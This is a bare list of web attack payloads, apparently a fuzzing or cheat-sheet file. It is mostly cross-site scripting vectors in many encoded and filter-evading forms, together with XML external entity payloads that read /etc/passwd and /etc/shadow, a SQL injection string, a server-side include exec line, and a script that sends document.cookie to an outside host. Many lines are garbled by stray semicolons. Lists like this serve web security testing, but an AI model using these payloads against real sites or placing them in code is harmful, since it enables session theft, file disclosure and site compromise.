</XSS STYLE=xss:expression(alert('XSS'))>

';;alert(String.fromCharCode(88,83,83))//\';;alert(String.fromCharCode(88,83,83))//";;alert(String.fromCharCode(88,83,83))//\";;alert(String.fromCharCode(88,83,83))//-->;<;/SCRIPT>;";>;';>;<;SCRIPT>;alert(String.fromCharCode(88,83,83))<;/SCRIPT>;

';';;!--";<;XSS>;=&;{()}

<;SCRIPT>;alert(';XSS';)<;/SCRIPT>;

<;SCRIPT SRC=http://ha.ckers.org/xss.js>;<;/SCRIPT>;

<;SCRIPT>;alert(String.fromCharCode(88,83,83))<;/SCRIPT>;

<;BASE HREF=";javascript:alert(';XSS';);//";>;

<;BGSOUND SRC=";javascript:alert(';XSS';);";>;

<;BODY BACKGROUND=";javascript:alert(';XSS';);";>;

<;BODY ONLOAD=alert(';XSS';)>;

<;DIV STYLE=";background-image: url(javascript:alert(';XSS';))";>;

<;DIV STYLE=";background-image: url(&;#1;javascript:alert(';XSS';))";>;

<;DIV STYLE=";width: expression(alert(';XSS';));";>;

<;FRAMESET>;<;FRAME SRC=";javascript:alert(';XSS';);";>;<;/FRAMESET>;

<;IFRAME SRC=";javascript:alert(';XSS';);";>;<;/IFRAME>;

<;INPUT TYPE=";IMAGE"; SRC=";javascript:alert(';XSS';);";>;

<;IMG SRC=";javascript:alert(';XSS';);";>;

<;IMG SRC=javascript:alert(';XSS';)>;

<;IMG DYNSRC=";javascript:alert(';XSS';);";>;

<;IMG LOWSRC=";javascript:alert(';XSS';);";>;

<;IMG SRC=";http://www.thesiteyouareon.com/somecommand.php?somevariables=maliciouscode";>;

Redirect 302 /a.jpg http://victimsite.com/admin.asp&;deleteuser

exp/*<;XSS STYLE=';no\xss:noxss(";*//*";);

<;STYLE>;li {list-style-image: url(";javascript:alert('XSS')";);}<;/STYLE>;<;UL>;<;LI>;XSS

<;IMG SRC=';vbscript:msgbox(";XSS";)';>;

<;LAYER SRC=";http://ha.ckers.org/scriptlet.html";>;<;/LAYER>;

<;IMG SRC=";livescript:[code]";>;

%BCscript%BEalert(%A2XSS%A2)%BC/script%BE

<;META HTTP-EQUIV=";refresh"; CONTENT=";0;url=javascript:alert(';XSS';);";>;

<;META HTTP-EQUIV=";refresh"; CONTENT=";0;url=data:text/html;base64,PHNjcmlwdD5hbGVydCgnWFNTJyk8L3NjcmlwdD4K";>;

<;META HTTP-EQUIV=";refresh"; CONTENT=";0; URL=http://;URL=javascript:alert(';XSS';);";>;

<;IMG SRC=";mocha:[code]";>;

<;OBJECT TYPE=";text/x-scriptlet"; DATA=";http://ha.ckers.org/scriptlet.html";>;<;/OBJECT>;

<;OBJECT classid=clsid:ae24fdae-03c6-11d1-8b76-0080c744f389>;<;param name=url value=javascript:alert(';XSS';)>;<;/OBJECT>;

<;EMBED SRC=";http://ha.ckers.org/xss.swf"; AllowScriptAccess=";always";>;<;/EMBED>;

a=";get";;&;#10;b=";URL(";";;&;#10;c=";javascript:";;&;#10;d=";alert(';XSS';);";)";;
eval(a+b+c+d);

<;STYLE TYPE=";text/javascript";>;alert(';XSS';);<;/STYLE>;

<;IMG STYLE=";xss:expr/*XSS*/ession(alert(';XSS';))";>;

<;XSS STYLE=";xss:expression(alert(';XSS';))";>;

<;STYLE>;.XSS{background-image:url(";javascript:alert(';XSS';)";);}<;/STYLE>;<;A CLASS=XSS>;<;/A>;

<;STYLE type=";text/css";>;BODY{background:url(";javascript:alert(';XSS';)";)}<;/STYLE>;

<;LINK REL=";stylesheet"; HREF=";javascript:alert(';XSS';);";>;

<;LINK REL=";stylesheet"; HREF=";http://ha.ckers.org/xss.css";>;

<;STYLE>;@import';http://ha.ckers.org/xss.css';;<;/STYLE>;

<;META HTTP-EQUIV=";Link"; Content=";<;http://ha.ckers.org/xss.css>;; REL=stylesheet";>;

<;STYLE>;BODY{-moz-binding:url(";http://ha.ckers.org/xssmoz.xml#xss";)}<;/STYLE>;

<;TABLE BACKGROUND=";javascript:alert(';XSS';)";>;<;/TABLE>;

<;TABLE>;<;TD BACKGROUND=";javascript:alert(';XSS';)";>;<;/TD>;<;/TABLE>;

<;HTML xmlns:xss>;

<;XML ID=I>;<;X>;<;C>;<;![CDATA[<;IMG SRC=";javas]]>;<;![CDATA[cript:alert(';XSS';);";>;]]>;

<;XML ID=";xss";>;<;I>;<;B>;<;IMG SRC=";javas<;!-- -->;cript:alert(';XSS';)";>;<;/B>;<;/I>;<;/XML>;

<;XML SRC=";http://ha.ckers.org/xsstest.xml"; ID=I>;<;/XML>;

<;HTML>;<;BODY>;

<;!--[if gte IE 4]>;

<;META HTTP-EQUIV=";Set-Cookie"; Content=";USERID=<;SCRIPT>;alert(';XSS';)<;/SCRIPT>;";>;

<;XSS STYLE=";behavior: url(http://ha.ckers.org/xss.htc);";>;

<;SCRIPT SRC=";http://ha.ckers.org/xss.jpg";>;<;/SCRIPT>;

<;!--#exec cmd=";/bin/echo ';<;SCRIPT SRC';";-->;<;!--#exec cmd=";/bin/echo ';=http://ha.ckers.org/xss.js>;<;/SCRIPT>;';";-->;

<;? echo(';<;SCR)';;

<;BR SIZE=";&;{alert(';XSS';)}";>;

<;IMG SRC=JaVaScRiPt:alert(';XSS';)>;

<;IMG SRC=javascript:alert(&;quot;XSS&;quot;)>;

<;IMG SRC=`javascript:alert(";RSnake says, ';XSS';";)`>;

<;IMG SRC=javascript:alert(String.fromCharCode(88,83,83))>;

<;IMG RC=&;#106;&;#97;&;#118;&;#97;&;#115;&;#99;&;#114;&;#105;&;#112;&;#116;&;#58;&;#97;&;#108;&;#101;&;#114;&;#116;&;#40;&;#39;&;#88;&;#83;&;#83;&;#39;&;#41;>;

<;IMG RC=&;#0000106&;#0000097&;#0000118&;#0000097&;#0000115&;#0000099&;#0000114&;#0000105&;#0000112&;#0000116&;#0000058&;#0000097&;#0000108&;#0000101&;#0000114&;#0000116&;#0000040&;#0000039&;#0000088&;#0000083&;#0000083&;#0000039&;#0000041>;

<;DIV STYLE=";background-image:\0075\0072\006C\0028';\006a\0061\0076\0061\0073\0063\0072\0069\0070\0074\003a\0061\006c\0065\0072\0074\0028.1027\0058.10530053\0027\0029';\0029";>;

<;IMG SRC=&;#x6A&;#x61&;#x76&;#x61&;#x73&;#x63&;#x72&;#x69&;#x70&;#x74&;#x3A&;#x61&;#x6C&;#x65&;#x72&;#x74&;#x28&;#x27&;#x58&;#x53&;#x53&;#x27&;#x29>;

<;HEAD>;<;META HTTP-EQUIV=";CONTENT-TYPE"; CONTENT=";text/html; charset=UTF-7";>; <;/HEAD>;+ADw-SCRIPT+AD4-alert(';XSS';);+ADw-/SCRIPT+AD4-

\";;alert(';XSS';);//

<;/TITLE>;<;SCRIPT>;alert("XSS");<;/SCRIPT>;

<;STYLE>;@im\port';\ja\vasc\ript:alert(";XSS";)';;<;/STYLE>;

<;IMG SRC=";jav	ascript:alert(';XSS';);";>;

<;IMG SRC=";jav&;#x09;ascript:alert(';XSS';);";>;

<;IMG SRC=";jav&;#x0A;ascript:alert(';XSS';);";>;

<;IMG SRC=";jav&;#x0D;ascript:alert(';XSS';);";>;

<;IMGSRC=";javascript:alert';XSS';)";>;

perl -e ';print ";<;IM SRC=java\0script:alert(";XSS";)>";;';>; out

perl -e ';print ";&;<;SCR\0IPT>;alert(";XSS";)<;/SCR\0IPT>;";;'; >; out

<;IMG SRC="; &;#14; javascript:alert(';XSS';);";>;

<;SCRIPT/XSS SRC=";http://ha.ckers.org/xss.js";>;<;/SCRIPT>;

<;BODY onload!#$%&;()*~+-_.,:;?@[/|\]^`=alert(";XSS";)>;

<;SCRIPT SRC=http://ha.ckers.org/xss.js

<;SCRIPT SRC=//ha.ckers.org/.j>;

<;IMG SRC=";javascript:alert(';XSS';)";

<;IFRAME SRC=http://ha.ckers.org/scriptlet.html <;

<;<;SCRIPT>;alert(";XSS";);//<;<;/SCRIPT>;

<;IMG ";";";>;<;SCRIPT>;alert(";XSS";)<;/SCRIPT>;";>;

<;SCRIPT>;a=/XSS/

<;SCRIPT a=";>;"; SRC=";http://ha.ckers.org/xss.js";>;<;/SCRIPT>;

<;SCRIPT =";blah"; SRC=";http://ha.ckers.org/xss.js";>;<;/SCRIPT>;

<;SCRIPT a=";blah"; ';'; SRC=";http://ha.ckers.org/xss.js";>;<;/SCRIPT>;

<;SCRIPT ";a=';>;';"; SRC=";http://ha.ckers.org/xss.js";>;<;/SCRIPT>;

<;SCRIPT a=`>;` SRC=";http://ha.ckers.org/xss.js";>;<;/SCRIPT>;

<;SCRIPT>;document.write(";<;SCRI";);<;/SCRIPT>;PT SRC=";http://ha.ckers.org/xss.js";>;<;/SCRIPT>;

<;SCRIPT a=";>';>"; SRC=";http://ha.ckers.org/xss.js";>;<;/SCRIPT>;

<;A HREF=";http://66.102.7.147/";>;XSS<;/A>;

<;A HREF=";http://%77%77%77%2E%67%6F%6F%67%6C%65%2E%63%6F%6D";>;XSS<;/A>;

<;A HREF=";http://1113982867/";>;XSS<;/A>;

<;A HREF=";http://0x42.0x0000066.0x7.0x93/";>;XSS<;/A>;

<;A HREF=";http://0102.0146.0007.00000223/";>;XSS<;/A>;

<;A HREF=";h
tt	p://6&;#09;6.000146.0x7.147/";>;XSS<;/A>;

<;A HREF=";//www.google.com/";>;XSS<;/A>;

<;A HREF=";//google";>;XSS<;/A>;

<;A HREF=";http://ha.ckers.org@google";>;XSS<;/A>;

<;A HREF=";http://google:ha.ckers.org";>;XSS<;/A>;

<;A HREF=";http://google.com/";>;XSS<;/A>;

<;A HREF=";http://www.google.com./";>;XSS<;/A>;

<;A HREF=";javascript:document.location=';http://www.google.com/';";>;XSS<;/A>;

<;A HREF=";http://www.gohttp://www.google.com/ogle.com/";>;XSS<;/A>;

<<SCRIPT>document.vulnerable=true;//<</SCRIPT>

<img SRC="javascript:document.vulnerable=true;"

\";document.vulnerable=true;;//

</title><SCRIPT>document.vulnerable=true;</script>

1script3document.vulnerable=true;1/script3

exp/*<A STYLE='no\xss:noxss("*//*");xss:ex/*XSS*//*/*/pression(document.vulnerable=true)'>

<XML ID="xss"><I><B><IMG SRC="javascript:document.vulnerable=true"></B></I></XML><SPAN DATASRC="#xss" DATAFLD="B" DATAFORMATAS="HTML"></span>

<? echo('<SCR)';echo('IPT>document.vulnerable=true</SCRIPT>'); ?>

<head><META HTTP-EQUIV="CONTENT-TYPE" CONTENT="text/html; charset=UTF-7"> </HEAD>+ADw-SCRIPT+AD4-document.vulnerable=true;+ADw-/SCRIPT+AD4-

&<script>document.vulnerable=true;</script>

&{document.vulnerable=true;};

<a href="about:<script>document.vulnerable=true;</script>">

<<script>document.vulnerable=true;</script>

<![</script>

<script>document.vulnerable=true;</script>

<img src="blah>" onmouseover="document.vulnerable=true;">

<xml id="X"><a><b><script>document.vulnerable=true;</script>;</b></a></xml>

[\xC0][\xBC]script>document.vulnerable=true;[\xC0][\xBC]/script>

<div style="binding: url(http://www.securitycompass.com/xss.js);"> [Mozilla]

";>;<;BODY onload!#$%&;()*~+-_.,:;?@[/|\]^`=alert(";XSS";)>;

<;/script>;<;script>;alert(1)<;/script>;

<;/br style=a:expression(alert())>;

<;scrscriptipt>;alert(1)<;/scrscriptipt>;

<;br size=\";&;{alert('XSS')}\";>;

perl -e 'print \";<;IMG SRC=java\0script:alert(\";XSS\";)>;\";;' >; out

perl -e 'print \";<;SCR\0IPT>;alert(\";XSS\";)<;/SCR\0IPT>;\";;' >; out

<~/XSS/*-*/STYLE=xss:e/**/xpression(alert('XSS'))>

<~/XSS/*-*/STYLE=xss:e/**/xpression(window.location="http://www.procheckup.com/?sid="%2bdocument.cookie)>

<~/XSS/*-*/STYLE=xss:e/**/xpression(alert('XSS'))>

<~/XSS STYLE=xss:expression(alert('XSS'))>

"><script>alert('XSS')</script>

</XSS/*-*/STYLE=xss:e/**/xpression(alert('XSS'))>

XSS/*-*/STYLE=xss:e/**/xpression(alert('XSS'))>

XSS STYLE=xss:e/**/xpression(alert('XSS'))>

</XSS STYLE=xss:expression(alert('XSS'))>

>"><script>alert("XSS")</script>&

"><STYLE>@import"javascript:alert('XSS')";</STYLE>

>"'><img%20src%3D%26%23x6a;%26%23x61;%26%23x76;%26%23x61;%26%23x73;%26%23x63;%26%23x72;%26%23x69;%26%23x70;%26%23x74;%26%23x3a;alert(%26quot;%26%23x20;XSS%26%23x20;Test%26%23x20;Successful%26quot;)>

>%22%27><img%20src%3d%22javascript:alert(%27%20XSS%27)%22>

'%uff1cscript%uff1ealert('XSS')%uff1c/script%uff1e'

'';!--"<XSS>=&{()}

<IMGSRC=java&<WBR>#115;crip&<WBR>#116;:ale&<WBR>#114;t('X&#83<WBR>;S'&#41>

<IMGSRC=&#0000106&#0000097&<WBR>#0000118&#0000097&#0000115&<WBR>#0000099&#0000114&#0000105&<WBR>#0000112&#0000116&#0000058&<WBR>#0000097&#0000108&#0000101&<WBR>#0000114&#0000116&#0000040&<WBR>#0000039&#0000088&#0000083&<WBR>#0000083&#0000039&#0000041>

<IMGSRC=&#x6A&#x61&#x76&#x61&#x73&<WBR>#x63&#x72&#x69&#x70&#x74&#x3A&<WBR>#x61&#x6C&#x65&#x72&#x74&#x28&<WBR>#x27&#x58&#x53&#x53&#x27&#x29>

<![CDATA[<script>var n=0;while(true){n++;}</script>]]>

<?xml version="1.0" encoding="ISO-8859-1"?><foo><![CDATA[<]]>SCRIPT<![CDATA[>]]>alert('gotcha');<![CDATA[<]]>/SCRIPT<![CDATA[>]]></foo>

<?xml version="1.0" encoding="ISO-8859-1"?><foo><![CDATA[' or 1=1 or ''=']]></foof>

<?xml version="1.0" encoding="ISO-8859-1"?><!DOCTYPE foo [<!ELEMENT foo ANY><!ENTITY xxe SYSTEM "file://c:/boot.ini">]><foo>&xee;</foo>

<?xml version="1.0" encoding="ISO-8859-1"?><!DOCTYPE foo [<!ELEMENT foo ANY><!ENTITY xxe SYSTEM "file:///etc/passwd">]><foo>&xee;</foo>

<?xml version="1.0" encoding="ISO-8859-1"?><!DOCTYPE foo [<!ELEMENT foo ANY><!ENTITY xxe SYSTEM "file:///etc/shadow">]><foo>&xee;</foo>

<?xml version="1.0" encoding="ISO-8859-1"?><!DOCTYPE foo [<!ELEMENT foo ANY><!ENTITY xxe SYSTEM "file:///dev/random">]><foo>&xee;</foo>

%3cscript%3ealert('XSS')%3c/script%3e

%22%3e%3cscript%3ealert('XSS')%3c/script%3e

<IMG """><SCRIPT>alert("XSS")</SCRIPT>">

<IMG SRC="javascript:alert('XSS')"

<<SCRIPT>alert("XSS");//<</SCRIPT>

%253cscript%253ealert(1)%253c/script%253e

"><s"%2b"cript>alert(document.cookie)</script>

foo<script>alert(1)</script>

<scr<script>ipt>alert(1)</scr</script>ipt>

<SCRIPT>String.fromCharCode(97, 108, 101, 114, 116, 40, 49, 41)</SCRIPT>

<marquee onstart='javascript:alert('1');'>=(◕_◕)=